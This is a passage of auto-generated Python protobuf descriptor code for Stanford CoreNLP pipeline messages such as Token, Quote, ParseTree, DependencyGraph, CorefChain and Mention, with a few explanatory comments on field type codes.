      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='timexValue', full_name='edu.stanford.nlp.pipeline.Token.timexValue', index=18,
      number=19, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='hasXmlContext', full_name='edu.stanford.nlp.pipeline.Token.hasXmlContext', index=19,
      number=21, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='xmlContext', full_name='edu.stanford.nlp.pipeline.Token.xmlContext', index=20,
      number=22, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='corefClusterID', full_name='edu.stanford.nlp.pipeline.Token.corefClusterID', index=21,
      number=23, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='answer', full_name='edu.stanford.nlp.pipeline.Token.answer', index=22,
      number=24, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='headWordIndex', full_name='edu.stanford.nlp.pipeline.Token.headWordIndex', index=23,
      number=26, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='operator', full_name='edu.stanford.nlp.pipeline.Token.operator', index=24,
      number=27, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='polarity', full_name='edu.stanford.nlp.pipeline.Token.polarity', index=25,
      number=28, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='span', full_name='edu.stanford.nlp.pipeline.Token.span', index=26,
      number=29, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentiment', full_name='edu.stanford.nlp.pipeline.Token.sentiment', index=27,
      number=30, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='quotationIndex', full_name='edu.stanford.nlp.pipeline.Token.quotationIndex', index=28,
      number=31, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='conllUFeatures', full_name='edu.stanford.nlp.pipeline.Token.conllUFeatures', index=29,
      number=32, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='coarseTag', full_name='edu.stanford.nlp.pipeline.Token.coarseTag', index=30,
      number=33, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='conllUTokenSpan', full_name='edu.stanford.nlp.pipeline.Token.conllUTokenSpan', index=31,
      number=34, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='conllUMisc', full_name='edu.stanford.nlp.pipeline.Token.conllUMisc', index=32,
      number=35, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='conllUSecondaryDeps', full_name='edu.stanford.nlp.pipeline.Token.conllUSecondaryDeps', index=33,
      number=36, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='wikipediaEntity', full_name='edu.stanford.nlp.pipeline.Token.wikipediaEntity', index=34,
      number=37, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='gender', full_name='edu.stanford.nlp.pipeline.Token.gender', index=35,
      number=51, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='trueCase', full_name='edu.stanford.nlp.pipeline.Token.trueCase', index=36,
      number=52, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='trueCaseText', full_name='edu.stanford.nlp.pipeline.Token.trueCaseText', index=37,
      number=53, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=True,
  # Tag numbers 100-255 are reserved for extensions (range end is exclusive).
  extension_ranges=[(100, 256), ],
  oneofs=[
  ],
  serialized_start=1928,
  serialized_end=2940,
)
# Descriptor for the protobuf message 'edu.stanford.nlp.pipeline.Quote'.
# NOTE(review): protoc-generated code — do not edit by hand; regenerate from
# the .proto instead. Numeric field codes follow descriptor.proto:
#   label: 1=optional
#   type:  9=string, 13=uint32
_QUOTE = _descriptor.Descriptor(
  name='Quote',
  full_name='edu.stanford.nlp.pipeline.Quote',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='text', full_name='edu.stanford.nlp.pipeline.Quote.text', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='begin', full_name='edu.stanford.nlp.pipeline.Quote.begin', index=1,
      number=2, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='end', full_name='edu.stanford.nlp.pipeline.Quote.end', index=2,
      number=3, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentenceBegin', full_name='edu.stanford.nlp.pipeline.Quote.sentenceBegin', index=3,
      number=5, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentenceEnd', full_name='edu.stanford.nlp.pipeline.Quote.sentenceEnd', index=4,
      number=6, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='tokenBegin', full_name='edu.stanford.nlp.pipeline.Quote.tokenBegin', index=5,
      number=7, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='tokenEnd', full_name='edu.stanford.nlp.pipeline.Quote.tokenEnd', index=6,
      number=8, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='docid', full_name='edu.stanford.nlp.pipeline.Quote.docid', index=7,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='index', full_name='edu.stanford.nlp.pipeline.Quote.index', index=8,
      number=10, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=2943,
  serialized_end=3104,
)
# Descriptor for the protobuf message 'edu.stanford.nlp.pipeline.ParseTree'
# (a recursive tree: the repeated 'child' field is itself a message).
# NOTE(review): protoc-generated code — do not edit by hand; regenerate from
# the .proto instead. Numeric field codes follow descriptor.proto:
#   label: 1=optional, 3=repeated
#   type:  1=double, 9=string, 11=message, 13=uint32, 14=enum
_PARSETREE = _descriptor.Descriptor(
  name='ParseTree',
  full_name='edu.stanford.nlp.pipeline.ParseTree',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='child', full_name='edu.stanford.nlp.pipeline.ParseTree.child', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='value', full_name='edu.stanford.nlp.pipeline.ParseTree.value', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='yieldBeginIndex', full_name='edu.stanford.nlp.pipeline.ParseTree.yieldBeginIndex', index=2,
      number=3, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='yieldEndIndex', full_name='edu.stanford.nlp.pipeline.ParseTree.yieldEndIndex', index=3,
      number=4, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='score', full_name='edu.stanford.nlp.pipeline.ParseTree.score', index=4,
      number=5, type=1, cpp_type=5, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentiment', full_name='edu.stanford.nlp.pipeline.ParseTree.sentiment', index=5,
      number=6, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3107,
  serialized_end=3306,
)
# Descriptor for the nested protobuf message
# 'edu.stanford.nlp.pipeline.DependencyGraph.Node' (a vertex addressed by
# sentence index + token index, with an optional copy annotation).
# NOTE(review): protoc-generated code — do not edit by hand; regenerate from
# the .proto instead. Numeric field codes follow descriptor.proto:
#   label: 1=optional, 2=required;  type: 13=uint32
_DEPENDENCYGRAPH_NODE = _descriptor.Descriptor(
  name='Node',
  full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node.sentenceIndex', index=0,
      number=1, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='index', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node.index', index=1,
      number=2, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='copyAnnotation', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node.copyAnnotation', index=2,
      number=3, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3472,
  serialized_end=3540,
)
# Descriptor for the nested protobuf message
# 'edu.stanford.nlp.pipeline.DependencyGraph.Edge' (a labeled dependency arc
# between two node indices).
# NOTE(review): protoc-generated code — do not edit by hand; regenerate from
# the .proto instead. Numeric field codes follow descriptor.proto:
#   label: 1=optional, 2=required
#   type:  8=bool, 9=string, 13=uint32, 14=enum
_DEPENDENCYGRAPH_EDGE = _descriptor.Descriptor(
  name='Edge',
  full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='source', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.source', index=0,
      number=1, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='target', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.target', index=1,
      number=2, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='dep', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.dep', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='isExtra', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.isExtra', index=3,
      number=4, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sourceCopy', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.sourceCopy', index=4,
      number=5, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='targetCopy', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.targetCopy', index=5,
      number=6, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    # 'language' is the one enum field here with an explicit default declared
    # in the .proto (has_default_value=True; the concrete default enum value is
    # resolved elsewhere in the generated file, not visible in this chunk).
    _descriptor.FieldDescriptor(
      name='language', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.language', index=6,
      number=7, type=14, cpp_type=8, label=1,
      has_default_value=True, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3543,
  serialized_end=3715,
)
_DEPENDENCYGRAPH = _descriptor.Descriptor(
name='DependencyGraph',
full_name='edu.stanford.nlp.pipeline.DependencyGraph',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='node', full_name='edu.stanford.nlp.pipeline.DependencyGraph.node', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='edge', full_name='edu.stanford.nlp.pipeline.DependencyGraph.edge', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='root', full_name='edu.stanford.nlp.pipeline.DependencyGraph.root', index=2,
number=3, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=_descriptor._ParseOptions(descriptor_pb2.FieldOptions(), _b('\020\001'))),
],
extensions=[
],
nested_types=[_DEPENDENCYGRAPH_NODE, _DEPENDENCYGRAPH_EDGE, ],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3309,
serialized_end=3715,
)
_COREFCHAIN_COREFMENTION = _descriptor.Descriptor(
name='CorefMention',
full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mentionID', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.mentionID', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionType', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.mentionType', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='number', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.number', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='gender', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.gender', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='animacy', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.animacy', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='beginIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.beginIndex', index=5,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.endIndex', index=6,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.headIndex', index=7,
number=9, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.sentenceIndex', index=8,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='position', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.position', index=9,
number=11, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3843,
serialized_end=4044,
)
_COREFCHAIN = _descriptor.Descriptor(
name='CorefChain',
full_name='edu.stanford.nlp.pipeline.CorefChain',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='chainID', full_name='edu.stanford.nlp.pipeline.CorefChain.chainID', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mention', full_name='edu.stanford.nlp.pipeline.CorefChain.mention', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='representative', full_name='edu.stanford.nlp.pipeline.CorefChain.representative', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_COREFCHAIN_COREFMENTION, ],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3718,
serialized_end=4044,
)
_MENTION = _descriptor.Descriptor(
name='Mention',
full_name='edu.stanford.nlp.pipeline.Mention',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mentionID', full_name='edu.stanford.nlp.pipeline.Mention.mentionID', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionType', full_name='edu.stanford.nlp.pipeline.Mention.mentionType', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='number', full_name='edu.stanford.nlp.pipeline.Mention.number', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='gender', full_name='edu.stanford.nlp.pipeline.Mention.gender', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='animacy', full_name='edu.stanford.nlp.pipeline.Mention.animacy', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='person', full_name='edu.stanford.nlp.pipeline.Mention.person', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='startIndex', full_name='edu.stanford.nlp.pipeline.Mention.startIndex', index=6,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endIndex', full_name='edu.stanford.nlp.pipeline.Mention.endIndex', index=7,
number=9, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headIndex', full_name='edu.stanford.nlp.pipeline.Mention.headIndex', index=8,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headString', full_name='edu.stanford.nlp.pipeline.Mention.headString', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='nerString', full_name='edu.stanford.nlp.pipeline.Mention.nerString', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='originalRef', full_name='edu.stanford.nlp.pipeline.Mention.originalRef', index=11,
number=13, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='goldCorefClusterID', full_name='edu.stanford.nlp.pipeline.Mention.goldCorefClusterID', index=12,
number=14, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='corefClusterID', full_name='edu.stanford.nlp.pipeline.Mention.corefClusterID', index=13,
number=15, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionNum', full_name='edu.stanford.nlp.pipeline.Mention.mentionNum', index=14,
number=16, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentNum', full_name='edu.stanford.nlp.pipeline.Mention.sentNum', index=15,
number=17, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='utter', full_name='edu.stanford.nlp.pipeline.Mention.utter', index=16,
number=18, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='paragraph', full_name='edu.stanford.nlp.pipeline.Mention.paragraph', index=17,
number=19, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isSubject', full_name='edu.stanford.nlp.pipeline.Mention.isSubject', index=18,
number=20, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isDirectObject', full_name='edu.stanford.nlp.pipeline.Mention.isDirectObject', index=19,
number=21, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isIndirectObject', full_name='edu.stanford.nlp.pipeline.Mention.isIndirectObject', index=20,
number=22, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isPrepositionObject', full_name='edu.stanford.nlp.pipeline.Mention.isPrepositionObject', index=21,
number=23, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasTwin', full_name='edu.stanford.nlp.pipeline.Mention.hasTwin', index=22,
number=24, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='generic', full_name='edu.stanford.nlp.pipeline.Mention.generic', index=23,
number=25, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isSingleton', full_name='edu.stanford.nlp.pipeline.Mention.isSingleton', index=24,
number=26, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasBasicDependency', full_name='edu.stanford.nlp.pipeline.Mention.hasBasicDependency', index=25,
number=27, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasEnhancedDepenedncy', full_name='edu.stanford.nlp.pipeline.Mention.hasEnhancedDepenedncy', index=26,
number=28, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
